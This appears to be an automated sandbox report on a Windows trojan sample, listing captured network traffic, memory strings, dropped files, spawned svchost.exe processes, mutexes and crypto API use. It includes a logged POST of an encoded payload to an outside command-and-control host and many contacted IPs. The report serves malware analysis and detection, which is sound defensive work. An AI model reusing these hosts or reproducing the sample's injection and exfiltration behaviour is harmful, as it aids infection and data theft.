              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Jetzt Kontakt aufnehmen","breadcrumb":{"@id":"https://www.com-sit.com/#breadcrumb"},"inLanguage":"de-DE","potentialAction":[{"@type":"ReadAction","target":["https://www.com-sit.com/"]}]},{"@type":"ImageObject","inLanguage":"de-DE","@id":"https://www.com-sit.com/#primaryimage","url":"https://www.com-sit.com/wp-content/uploads/2023/04/Header_1.jpg","contentUrl":"https://www.com-sit.com/wp-content/uploads/2023/04/Header_1.jpg","width":1920,"height":1080},{"@type":"BreadcrumbList","@id":"https://www.com-sit.com/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home"}]},{"@type":"WebSite","@id":"https://www.com-sit.com/#website","url":"https://www.com-sit.com/","name":"Comsit Website","description":"","publisher":{"@id":"https://www.com-sit.com/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https://www.com-sit.com/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"de-DE"},{"@type":"Organization","@id":"https://www.com-sit.com/#organization","name":"ComSIT Distribution GmbH","url":"https://www.com-sit.com/","logo":{"@type":"ImageObject","inLanguage":"de-DE","@id":"https://www.com-sit.com/#/schema/logo/image/","url":"https://www.com-sit.com/wp-content/uploads/2023/03/Comsit.png","contentUrl":"https://www.com-sit.com/wp-content/uploads/2023/03/Comsit.png","width":1920,"height":417,"caption":"ComSIT Distribution GmbH"},"image":{"@id":"https://www.com-sit.com/#/schema/logo/image/"},"sameAs":["https://www.facebook.com/ComSITGmbH","https://www.linkedin.com/company/41265647/"]}]}</script> equals www.linkedin.com (Linkedin)
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: <a class="elementor-icon elementor-social-icon elementor-social-icon-linkedin elementor-repeater-item-dd39117" href="https://www.linkedin.com/company/comsit-distribution-gmbh/" target="_blank"> equals www.linkedin.com (Linkedin)
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: <meta property="article:publisher" content="https://www.facebook.com/ComSITGmbH" /> equals www.facebook.com (Facebook)
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: var elementorFrontendConfig = {"environmentMode":{"edit":false,"wpPreview":false,"isScriptDebug":false},"i18n":{"shareOnFacebook":"Auf Facebook teilen","shareOnTwitter":"Auf Twitter teilen","pinIt":"Anheften","download":"Download","downloadImage":"Bild downloaden","fullscreen":"Vollbild","zoom":"Zoom","share":"Teilen","playVideo":"Video abspielen","previous":"Zur\u00fcck","next":"Weiter","close":"Schlie\u00dfen","a11yCarouselWrapperAriaLabel":"Carousel | Horizontal scrolling: Arrow Left & Right","a11yCarouselPrevSlideMessage":"Previous slide","a11yCarouselNextSlideMessage":"Next slide","a11yCarouselFirstSlideMessage":"This is the first slide","a11yCarouselLastSlideMessage":"This is the last slide","a11yCarouselPaginationBulletMessage":"Go to slide"},"is_rtl":false,"breakpoints":{"xs":0,"sm":480,"md":768,"lg":1025,"xl":1440,"xxl":1600},"responsive":{"breakpoints":{"mobile":{"label":"Mobile Portrait","value":767,"default_value":767,"direction":"max","is_enabled":true},"mobile_extra":{"label":"Mobile Landscape","value":880,"default_value":880,"direction":"max","is_enabled":false},"tablet":{"label":"Tablet Portrait","value":1024,"default_value":1024,"direction":"max","is_enabled":true},"tablet_extra":{"label":"Tablet Landscape","value":1200,"default_value":1200,"direction":"max","is_enabled":false},"laptop":{"label":"Laptop","value":1366,"default_value":1366,"direction":"max","is_enabled":false},"widescreen":{"label":"Breitbild","value":2400,"default_value":2400,"direction":"min","is_enabled":false}}},"version":"3.15.3","is_static":false,"experimentalFeatures":{"e_dom_optimization":true,"e_optimized_assets_loading":true,"e_optimized_css_loading":true,"additional_custom_breakpoints":true,"e_swiper_latest":true,"theme_builder_v2":true,"hello-theme-header-footer":true,"landing-pages":true,"page-transitions":true,"notes":true,"loop":true,"form-submissions":true,"e_scroll_snap":true},"urls":{"assets":"http:\/\/www.com-sit.com\/wp-content\/plugins\/elementor\/assets\/"},"swiperClass":"swiper","settings":{"page":[],"editorPreferences":[]},"kit":{"active_breakpoints":["viewport_mobile","viewport_tablet"],"global_image_lightbox":"yes","lightbox_enable_counter":"yes","lightbox_enable_fullscreen":"yes","lightbox_enable_zoom":"yes","lightbox_enable_share":"yes","lightbox_title_src":"title","lightbox_description_src":"description","hello_header_logo_type":"title","hello_header_menu_layout":"horizontal","hello_footer_logo_type":"logo"},"post":{"id":46,"title":"ComSIT%20-%20Ihr%20nachhaltiger%20Spezialist%20f%C3%BCr%20elektronische%20Bauelemente","excerpt":"","featuredImage":false}}; equals www.facebook.com (Facebook)
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: var elementorFrontendConfig = {"environmentMode":{"edit":false,"wpPreview":false,"isScriptDebug":false},"i18n":{"shareOnFacebook":"Auf Facebook teilen","shareOnTwitter":"Auf Twitter teilen","pinIt":"Anheften","download":"Download","downloadImage":"Bild downloaden","fullscreen":"Vollbild","zoom":"Zoom","share":"Teilen","playVideo":"Video abspielen","previous":"Zur\u00fcck","next":"Weiter","close":"Schlie\u00dfen","a11yCarouselWrapperAriaLabel":"Carousel | Horizontal scrolling: Arrow Left & Right","a11yCarouselPrevSlideMessage":"Previous slide","a11yCarouselNextSlideMessage":"Next slide","a11yCarouselFirstSlideMessage":"This is the first slide","a11yCarouselLastSlideMessage":"This is the last slide","a11yCarouselPaginationBulletMessage":"Go to slide"},"is_rtl":false,"breakpoints":{"xs":0,"sm":480,"md":768,"lg":1025,"xl":1440,"xxl":1600},"responsive":{"breakpoints":{"mobile":{"label":"Mobile Portrait","value":767,"default_value":767,"direction":"max","is_enabled":true},"mobile_extra":{"label":"Mobile Landscape","value":880,"default_value":880,"direction":"max","is_enabled":false},"tablet":{"label":"Tablet Portrait","value":1024,"default_value":1024,"direction":"max","is_enabled":true},"tablet_extra":{"label":"Tablet Landscape","value":1200,"default_value":1200,"direction":"max","is_enabled":false},"laptop":{"label":"Laptop","value":1366,"default_value":1366,"direction":"max","is_enabled":false},"widescreen":{"label":"Breitbild","value":2400,"default_value":2400,"direction":"min","is_enabled":false}}},"version":"3.15.3","is_static":false,"experimentalFeatures":{"e_dom_optimization":true,"e_optimized_assets_loading":true,"e_optimized_css_loading":true,"additional_custom_breakpoints":true,"e_swiper_latest":true,"theme_builder_v2":true,"hello-theme-header-footer":true,"landing-pages":true,"page-transitions":true,"notes":true,"loop":true,"form-submissions":true,"e_scroll_snap":true},"urls":{"assets":"http:\/\/www.com-sit.com\/wp-content\/plugins\/elementor\/assets\/"},"swiperClass":"swiper","settings":{"page":[],"editorPreferences":[]},"kit":{"active_breakpoints":["viewport_mobile","viewport_tablet"],"global_image_lightbox":"yes","lightbox_enable_counter":"yes","lightbox_enable_fullscreen":"yes","lightbox_enable_zoom":"yes","lightbox_enable_share":"yes","lightbox_title_src":"title","lightbox_description_src":"description","hello_header_logo_type":"title","hello_header_menu_layout":"horizontal","hello_footer_logo_type":"logo"},"post":{"id":46,"title":"ComSIT%20-%20Ihr%20nachhaltiger%20Spezialist%20f%C3%BCr%20elektronische%20Bauelemente","excerpt":"","featuredImage":false}}; equals www.twitter.com (Twitter)
              Source: unknownHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jenco.co.ukCache-Control: no-cacheData Raw: 43 66 44 32 48 66 6d 30 33 73 55 6b 48 45 38 49 69 46 6f 71 73 5a 49 66 31 2b 58 58 62 58 2b 42 50 53 63 62 2f 71 36 64 35 50 33 34 44 45 62 49 65 30 4f 41 39 5a 7a 36 2f 52 55 4e 4d 31 46 64 44 37 33 58 4e 34 64 69 55 50 65 78 49 33 58 37 61 47 78 44 37 5a 7a 47 68 41 61 54 38 42 52 6c 6f 37 45 32 4c 46 72 4d 57 5a 33 6d 33 53 78 55 64 44 44 57 67 54 2b 6a 65 2f 35 42 66 76 63 41 7a 51 4c 61 6c 51 76 50 38 64 49 30 77 68 45 48 79 6e 4d 43 43 37 54 45 56 35 44 44 2b 48 75 45 62 4f 6b 38 53 6b 7a 43 77 4d 6e 2f 76 34 69 6a 68 6b 48 55 63 54 4f 67 52 51 2b 65 54 38 62 66 2f 6e 70 33 76 4d 37 5a 78 43 76 69 72 73 51 56 4f 71 68 51 70 76 76 49 50 38 38 49 5a 45 67 58 30 4c 31 47 34 34 4c 66 44 68 69 76 4d 43 65 55 31 78 57 58 72 59 62 4a 7a 47 63 38 4e 35 4d 59 79 73 6d 31 55 5a 77 66 70 59 55 57 62 78 72 55 39 51 44 46 67 45 5a 31 72 4a 77 77 56 57 57 44 75 68 6d 41 2b 42 70 74 41 57 34 59 59 4f 79 48 52 50 6c 43 32 6d 38 4a 67 68 52 76 41 37 6e 47 41 49 46 65 71 66 6e 35 46 6c 30 43 56 57 30 57 62 4e 63 64 30 4d 6e 36 58 6e 5a 6d 48 5a 6a 43 30 4a 70 2f 37 30 68 71 78 72 41 79 2b 6a 68 37 52 33 36 48 50 49 30 4a 6b 58 67 68 44 35 45 42 71 76 42 6a 47 48 30 6f 37 69 58 4b 33 4a 78 65 2b 69 6d 76 6a 55 71 37 6d 4e 44 54 65 41 38 64 6c 6d 4e 33 68 35 74 77 56 63 71 36 6c 63 37 56 4a 49 43 71 43 62 51 77 51 52 61 6a 33 4c 4f 68 5a 75 35 71 6e 75 54 59 2f 52 75 30 33 38 44 67 4c 6b 61 32 4c 52 58 49 6f 59 4b 77 51 4f 6f 34 77 50 4c 65 76 47 41 36 75 67 4e 78 56 67 76 6e 79 43 4f 52 4b 2f 49 76 4a 5a 54 2f 39 6d 47 51 42 72 6a 42 4c 2b 73 52 7a 5a 37 43 35 78 50 74 4d 2b 6a 68 55 6a 47 72 54 73 7a 30 32 51 35 74 49 77 4f 4e 30 77 3d 3d Data Ascii: CfD2Hfm03sUkHE8IiFoqsZIf1+XXbX+BPScb/q6d5P34DEbIe0OA9Zz6/RUNM1FdD73XN4diUPexI3X7aGxD7ZzGhAaT8BRlo7E2LFrMWZ3m3SxUdDDWgT+je/5BfvcAzQLalQvP8dI0whEHynMCC7TEV5DD+HuEbOk8SkzCwMn/v4ijhkHUcTOgRQ+eT8bf/np3vM7ZxCvirsQVOqhQpvvIP88IZEgX0L1G44LfDhivMCeU1xWXrYbJzGc8N5MYysm1UZwfpYUWbxrU9QDFgEZ1rJwwVWWDuhmA+BptAW4YYOyHRPlC2m8JghRvA7nGAIFeqfn5Fl0CVW0WbNcd0Mn6XnZmHZjC0Jp/70hqxrAy+jh7R36HPI0JkXghD5EBqvBjGH0o7iXK3Jxe+imvjUq7mNDTeA8dlmN3h5twVcq6lc7VJICqCbQwQRaj3LOhZu5qnuTY/Ru038DgLka2LRXIoYKwQOo4wPLevGA6ugNxVgvnyCORK/IvJZT/9mGQBrjBL+sRzZ7C5xPtM+jhUjGrTsz02Q5tIwON0w==
              Source: unknownHTTPS traffic detected: 172.67.164.178:443 -> 192.168.2.3:50183 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 91.229.22.126:443 -> 192.168.2.3:50157 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.237.66.112:443 -> 192.168.2.3:50193 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 94.130.146.206:443 -> 192.168.2.3:50209 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.237.66.112:443 -> 192.168.2.3:50211 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.156.49:443 -> 192.168.2.3:50245 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.164.178:443 -> 192.168.2.3:50247 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 75.2.95.235:443 -> 192.168.2.3:50242 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.52.126:443 -> 192.168.2.3:50251 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 83.223.113.46:443 -> 192.168.2.3:50248 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 94.130.146.206:443 -> 192.168.2.3:50261 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 49.212.235.175:443 -> 192.168.2.3:50255 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 5.189.171.125:443 -> 192.168.2.3:50277 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 75.2.95.235:443 -> 192.168.2.3:62797 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.52.126:443 -> 192.168.2.3:63074 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 94.130.146.206:443 -> 192.168.2.3:63778 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 83.223.113.46:443 -> 192.168.2.3:63835 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.237.66.112:443 -> 192.168.2.3:64256 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 91.229.22.126:443 -> 192.168.2.3:64102 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 49.212.235.175:443 -> 192.168.2.3:64134 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.164.178:443 -> 192.168.2.3:64377 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.237.66.112:443 -> 192.168.2.3:64318 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 5.189.171.125:443 -> 192.168.2.3:64328 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 94.130.146.206:443 -> 192.168.2.3:64428 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 75.2.95.235:443 -> 192.168.2.3:43302 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.156.49:443 -> 192.168.2.3:44526 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 5.189.171.125:443 -> 192.168.2.3:44804 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 49.212.235.175:443 -> 192.168.2.3:44394 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 83.223.113.46:443 -> 192.168.2.3:45042 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.164.178:443 -> 192.168.2.3:45976 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.237.66.112:443 -> 192.168.2.3:45979 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 91.229.22.126:443 -> 192.168.2.3:45999 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.52.126:443 -> 192.168.2.3:46186 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 94.130.146.206:443 -> 192.168.2.3:46228 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 94.130.146.206:443 -> 192.168.2.3:48033 version: TLS 1.2

              Spam, unwanted Advertisements and Ransom Demands

              barindex
              Source: SMTPNetwork traffic detected: Mail traffic on many different IPs 41
              Source: C:\Users\user\pigalicapi.exeCode function: 1_2_005D8A70 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptImportKey,CryptImportKey,CryptDecrypt,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,1_2_005D8A70
              Source: C:\Users\user\pigalicapi.exeCode function: 1_2_005D8800 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptGenKey,CryptExportKey,CryptImportKey,CryptExportKey,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,1_2_005D8800
              Source: C:\Users\user\pigalicapi.exeCode function: 1_2_005D8970 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptImportKey,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,1_2_005D8970
              Source: C:\Users\user\pigalicapi.exeCode function: 1_2_005E16981_2_005E1698
              Source: C:\Users\user\pigalicapi.exeCode function: 1_2_012038501_2_01203850
              Source: C:\Users\user\pigalicapi.exeCode function: 1_2_012144CB1_2_012144CB
              Source: C:\Users\user\pigalicapi.exeCode function: 1_2_012031201_2_01203120
              Source: C:\Users\user\pigalicapi.exeCode function: 1_2_0121310F1_2_0121310F
              Source: C:\Users\user\pigalicapi.exeCode function: 1_2_01203D711_2_01203D71
              Source: C:\Users\user\pigalicapi.exeCode function: 1_2_012151401_2_01215140
              Source: C:\Users\user\pigalicapi.exeCode function: 1_2_01214D5E1_2_01214D5E
              Source: C:\Users\user\pigalicapi.exeCode function: 1_2_012135BF1_2_012135BF
              Source: C:\Users\user\pigalicapi.exeCode function: 1_2_012035F71_2_012035F7
              Source: C:\Users\user\pigalicapi.exeCode function: 1_2_012010001_2_01201000
              Source: C:\Users\user\pigalicapi.exeCode function: 1_2_01213C161_2_01213C16
              Source: C:\Users\user\pigalicapi.exeCode function: 1_2_012148631_2_01214863
              Source: C:\Users\user\pigalicapi.exeCode function: 1_2_0120A0CA1_2_0120A0CA
              Source: C:\Users\user\pigalicapi.exeCode function: 1_2_01204B101_2_01204B10
              Source: C:\Users\user\pigalicapi.exeCode function: 1_2_012017611_2_01201761
              Source: C:\Users\user\pigalicapi.exeCode function: 1_2_0120438E1_2_0120438E
              Source: C:\Users\user\pigalicapi.exeCode function: 1_2_01213A9B1_2_01213A9B
              Source: C:\Users\user\pigalicapi.exeCode function: 1_2_012082CE1_2_012082CE
              Source: C:\Users\user\pigalicapi.exeCode function: 1_2_005980A11_2_005980A1
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0408A6BA11_2_0408A6BA
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_04007F7911_2_04007F79
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0400779911_2_04007799
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0400B93511_2_0400B935
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_040072C411_2_040072C4
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_04007B6D11_2_04007B6D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0400839911_2_04008399
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_13147B0414_2_13147B04
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_13146FB214_2_13146FB2
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_1314F2B214_2_1314F2B2
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_1314F6DD14_2_1314F6DD
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_1314FD1214_2_1314FD12
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_1314959114_2_13149591
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_1315258014_2_13152580
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_13147B1415_2_13147B14
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_13146FC215_2_13146FC2
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_1314F2C215_2_1314F2C2
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_1314F6ED15_2_1314F6ED
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_1314FD2215_2_1314FD22
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_1315259015_2_13152590
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_131495A115_2_131495A1
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_13147B1416_2_13147B14
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_13146FC216_2_13146FC2
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_1314F2C216_2_1314F2C2
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_1314F6ED16_2_1314F6ED
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_1314FD2216_2_1314FD22
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_1315259016_2_13152590
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_131495A116_2_131495A1
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 21_2_13146FB221_2_13146FB2
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 21_2_1314F2B221_2_1314F2B2
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 21_2_1314F6DD21_2_1314F6DD
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 21_2_1314FD1221_2_1314FD12
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 21_2_1314959121_2_13149591
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 21_2_1315258021_2_13152580
              Source: OWd39WUX3D.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: OWd39WUX3D.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\OWd39WUX3D.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CryptoJump to behavior
              Source: classification engineClassification label: mal100.spre.troj.evad.winEXE@28/4@2171/100
              Source: OWd39WUX3D.exeReversingLabs: Detection: 29%
              Source: OWd39WUX3D.exeVirustotal: Detection: 38%
              Source: C:\Users\user\Desktop\OWd39WUX3D.exeFile read: C:\Users\user\Desktop\OWd39WUX3D.exeJump to behavior
              Source: C:\Users\user\Desktop\OWd39WUX3D.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\OWd39WUX3D.exe C:\Users\user\Desktop\OWd39WUX3D.exe
              Source: unknownProcess created: C:\Users\user\pigalicapi.exe "C:\Users\user\pigalicapi.exe"
              Source: C:\Users\user\Desktop\OWd39WUX3D.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
              Source: C:\Users\user\pigalicapi.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
              Source: C:\Users\user\Desktop\OWd39WUX3D.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
              Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
              Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
              Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
              Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
              Source: C:\Users\user\pigalicapi.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
              Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
              Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
              Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
              Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
              Source: C:\Users\user\Desktop\OWd39WUX3D.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
              Source: C:\Users\user\Desktop\OWd39WUX3D.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
              Source: C:\Users\user\Desktop\OWd39WUX3D.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
              Source: C:\Users\user\Desktop\OWd39WUX3D.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
              Source: C:\Users\user\pigalicapi.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
              Source: C:\Users\user\pigalicapi.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
              Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
              Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
              Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
              Source: C:\Users\user\Desktop\OWd39WUX3D.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_1314515F OpenProcessToken,LookupPrivilegeValueA,CloseHandle,AdjustTokenPrivileges,GetLastError,14_2_1314515F
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_1314516F OpenProcessToken,LookupPrivilegeValueA,CloseHandle,AdjustTokenPrivileges,GetLastError,15_2_1314516F
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_1314516F OpenProcessToken,LookupPrivilegeValueA,CloseHandle,AdjustTokenPrivileges,GetLastError,16_2_1314516F
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 21_2_1314515F OpenProcessToken,LookupPrivilegeValueA,CloseHandle,AdjustTokenPrivileges,GetLastError,21_2_1314515F
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_04001660 CoCreateInstance,14_2_04001660
              Source: C:\Users\user\pigalicapi.exeCode function: 1_2_005D1CA0 CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,Process32Next,Process32First,lstrlenA,lstrcpyA,OpenProcess,EnumProcessModules,K32EnumProcessModules,GetModuleFileNameExA,GetProcessImageFileNameA,K32GetProcessImageFileNameA,FindCloseChangeNotification,Process32Next,CloseHandle,1_2_005D1CA0
              Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\zczoiir65502
              Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\rjsfitz60229
              Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\pvoaiwz6588
              Source: C:\Users\user\Desktop\OWd39WUX3D.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\OWd39WUX3D.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\OWd39WUX3D.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\pigalicapi.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\pigalicapi.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
